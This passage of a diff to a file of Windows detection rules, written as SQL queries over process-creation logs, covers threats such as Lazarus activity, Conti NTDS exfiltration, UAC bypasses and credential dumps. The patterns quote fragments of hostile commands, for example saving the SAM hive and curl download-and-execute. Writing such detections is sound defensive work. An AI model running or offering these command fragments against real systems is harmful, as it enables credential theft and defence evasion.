'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036.005" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ + "attack.g0032", "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ "attack.collection", - "attack.t1560" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", - "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'CIPHER.EXE' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "status": "experimental", - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "author": "omkar72", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1574.008" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", - "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "status": "test", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1489" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE 